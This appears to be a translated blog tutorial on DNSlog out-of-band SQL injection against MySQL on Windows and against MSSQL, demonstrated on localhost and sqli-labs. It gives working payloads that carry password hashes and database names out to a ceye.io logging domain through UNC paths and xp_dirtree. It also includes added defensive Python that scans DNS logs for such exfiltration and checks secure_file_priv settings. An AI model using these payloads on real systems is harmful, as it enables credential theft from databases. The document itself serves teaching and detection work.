DNSlog injection

Why DNSlog injection exists

When testing some sites, the injection produces no echo, so the tester has to fall back on blind injection driven by a script. Some sites will then ban our IP; that can be handled with a proxy pool, but blind injection is inefficient by nature, which is why DNSlog injection came about.

DNSlog injection scenarios

Blind SQL injection; command execution with no visible output; SSRF with no echo.

DNSlog injection principle

Configure a domain name (for example ceye.io), then at the registrar set the domain's nameserver to server A, and run a DNS server on A. Since every lookup of a ceye.io subdomain is then sent to server A, any domain name that gets queried can be monitored in real time, as shown below:

Injection statement: http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))

1) '.mysql.nk40ci.ceye.io\abc'))

The tail of the payload builds a UNC path, which is why this dnslog technique can only be used when MySQL runs on Windows. The path MySQL ends up trying to open looks like:

\\abc.mysql.nk40ci.ceye.io\abc

The load_file function on Linux cannot be used for a dnslog attack, because the whole trick relies on a small Windows feature: the UNC path.

2) UNC path

Baidu Baike's explanation of UNC paths: UNC is a naming convention, used mainly to specify and map network drives on Microsoft Windows. The UNC naming convention is what most LANs use to reach a file server or printer, and ordinary network file sharing works this way.

In fact, when we share files in Windows we normally use a network address of this form: \\sss.xxx\test\

CONCAT() concatenates four backslashes, which after escaping become two backslashes, and that is what turns the result into a UNC path.

Tip: Linux has no UNC paths, so when MySQL is running on a Linux system this method cannot be used to carry data out.


mssql

A common POC is as follows:

SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.ip.port.b182oj.ceye.io';

EXEC('master..xp_dirtree"\'+@host+'\foobar$"');

In the database console this does indeed retrieve the hex-encoded hash of the sa user. But to fetch the actual data from our test_user table, the POC needs some adjustment.

First, in SQL Server a field whose name collides with a function name must be wrapped in [], as shown below:

Here the user field has the same name as the system user() function, so the field has to be wrapped in [].

DNS leaves a log when it resolves a name. Reading the multi-level domain names out of that resolution log (the domain name is obtained by concatenation) recovers the information.

http://ceye.io is a free platform that records dnslog. After registering, the control panel gives you a second-level domain xxx.ceye.io; when we inject information into a third-level domain, the platform's log records it in the background.
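On the defending side, the same records that the principle section and the ceye.io paragraph describe exist in the resolver's own query log. The following Python is an added example, not code from the original post: it scans constructed BIND-style query-log lines for the two indicators this page shows, a query into a known dnslog zone (ceye.io here) and a label that is hex-encoded data, as produced by MySQL's hex() in the MySQL payload and by fn_varbintohexstr() in the MSSQL POC. The log lines, client addresses and every zone name other than ceye.io are constructed for the example.

```python
import binascii
import re
import string

# Constructed BIND-style query-log lines (not taken from the original post).
# The hex label below encodes "admin123", the 0x... label imitates the output of
# SQL Server's fn_varbintohexstr(), and "security" is a plain database name, as
# in the sqli-labs example later on this page. Client addresses are documentation ranges.
SAMPLE_DNS_LOG = """\
client 203.0.113.7#51234: query: www.example.com IN A + (198.51.100.5)
client 203.0.113.7#51235: query: 61646d696e313233.mysql.nk40ci.ceye.io IN A + (198.51.100.5)
client 203.0.113.9#51236: query: 0x0200a1b2c3d4.ip.port.b182oj.ceye.io IN A + (198.51.100.5)
client 203.0.113.9#51237: query: security.xxxxx.ceye.io IN A + (198.51.100.5)
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_LABEL_RE = re.compile(r"^(0x)?[0-9a-f]+$", re.IGNORECASE)
PRINTABLE = set(string.printable)


def parse_queries(log_text):
    """Yield (client_ip, query_name) for every line that looks like a query-log entry."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("client"), m.group("qname").rstrip(".")


def decode_hex_label(label, min_hex_len=8):
    """Return the bytes a label encodes if it is an even-length hex string
    (optionally 0x-prefixed) of at least min_hex_len digits, else None.
    The minimum length keeps short benign labels such as 'abc' or 'cafe' out."""
    if not HEX_LABEL_RE.match(label):
        return None
    digits = label[2:] if label[:2].lower() == "0x" else label
    if len(digits) < min_hex_len or len(digits) % 2:
        return None
    return binascii.unhexlify(digits)


def find_exfil_candidates(log_text, watched_suffixes=("ceye.io",), min_hex_len=8):
    """Flag queries that carry data out through DNS labels.

    Two indicators are checked: the name sits under a known dnslog zone, or one
    of its labels is hex-encoded data. Each hit records the first decodable label,
    rendered as text when it is printable ASCII and as hex otherwise.
    """
    hits = []
    for client, qname in parse_queries(log_text):
        reasons, decoded = [], None
        if any(qname == s or qname.endswith("." + s) for s in watched_suffixes):
            reasons.append("known dnslog zone")
        for label in qname.split("."):
            raw = decode_hex_label(label, min_hex_len)
            if raw is None:
                continue
            reasons.append("hex-encoded label")
            text = raw.decode("ascii", errors="replace")
            decoded = text if all(c in PRINTABLE for c in text) else raw.hex()
            break
        if reasons:
            hits.append({"client": client, "qname": qname, "reasons": reasons, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_exfil_candidates(SAMPLE_DNS_LOG):
        print(hit["client"], hit["qname"], hit["reasons"], hit["decoded"])
```

A DNS label is limited to 63 bytes, so a long value either gets split across several labels or makes the lookup fail outright; the scan therefore checks every label of the name, not just the first. Hex-looking labels do occur legitimately (content hashes on CDNs, for instance), so the hits are candidates for review, and the signal is strongest when the log is filtered to queries originating from database servers, which normally have no business resolving external names at all.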

Example: blind SQL injection

DNSlog blind injection needs the load_file() function, which generally requires root privileges. Run show variables like '%secure%'; to see which disk load_file() is allowed to read.

When secure_file_priv is NULL, load_file cannot load files;

When secure_file_priv is G:\, files on the G drive can be read;

When secure_file_priv is empty, directories on any disk can be read.

By setting secure_file_priv="" in my.ini, load_file can read files from any disk.
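The three secure_file_priv states listed above are easiest to reason about as a check. The following Python is an added example, not MySQL's own logic and not code from the original post: load_file_allowed() applies the documented rule (NULL disables file operations, an empty value allows any path, a directory restricts reads to that directory) to a requested path, and shows why a UNC path like the one used on this page is only reachable under the empty setting. The sample paths and the UNC host name are constructed; the FILE privilege that load_file() also needs is outside this check.

```python
import ntpath
import posixpath


def load_file_allowed(secure_file_priv, requested_path, windows=True):
    """Decide whether the secure_file_priv setting would let LOAD_FILE(requested_path) proceed.

    Example logic mirroring the three states listed above, not MySQL's own code:
      None / "NULL"  -> file import and export disabled entirely
      ""             -> no restriction: any readable path, UNC paths included
      "<directory>"  -> only files located below that directory
    Returns (allowed, reason).
    """
    # The mysql client prints the NULL state as the literal text "NULL".
    if secure_file_priv is None or secure_file_priv == "NULL":
        return False, "secure_file_priv is NULL: LOAD_FILE is disabled"
    if secure_file_priv == "":
        return True, "secure_file_priv is empty: no path restriction"

    p = ntpath if windows else posixpath
    # Normalise both sides so '..' segments and case differences cannot slip past the prefix test.
    base = p.normcase(p.normpath(secure_file_priv))
    target = p.normcase(p.normpath(requested_path))
    base_prefix = base if base.endswith(p.sep) else base + p.sep
    if target.startswith(base_prefix):
        return True, f"{requested_path} lies under {secure_file_priv}"
    return False, f"{requested_path} lies outside {secure_file_priv}"


if __name__ == "__main__":
    # Constructed sample; the UNC host is a placeholder, not a real dnslog domain.
    unc = "\\\\afanti.example.invalid\\aaa"
    for setting in (None, "", "G:\\", "C:\\mysql\\files"):
        print(repr(setting), load_file_allowed(setting, unc))
```

The directory form is the setting a hardening review should expect to find: a dedicated directory such as the one MySQL's own packages ship for mysql-files keeps LOAD_FILE() usable for legitimate imports while making a UNC target, and therefore the DNS lookup it triggers, fall outside the permitted prefix.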

Run on the mysql command line: select load_file('\\\\afanti.xxxx.ceye.io\\aaa'); where afanti marks the spot the injected query statement goes.

Check the platform: the dnsLog has been recorded.

The load_file() function can trigger a DNS resolution request. The target host is an internet-connected Windows system, and compiled files can be read.

SQL statement executed: SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\\\',(select database()),'.xxxxx.ceye.io\\abc'))),1,0)

Check the dnslog: the security database has been queried out:

Payload: to avoid the long sleep() delays, the data is carried out of band; the marked part is the domain name

http://localhost/sqlilabs/Less-5/?id=1%27%20and%20if((select%20load_file(concat(%27\\\\%27,(select%20database()),%27.uz3g1r.ceye.io\\abc%27))),1,0)--+


Source: blog.csdn.net/qq_41210745/article/details/103580998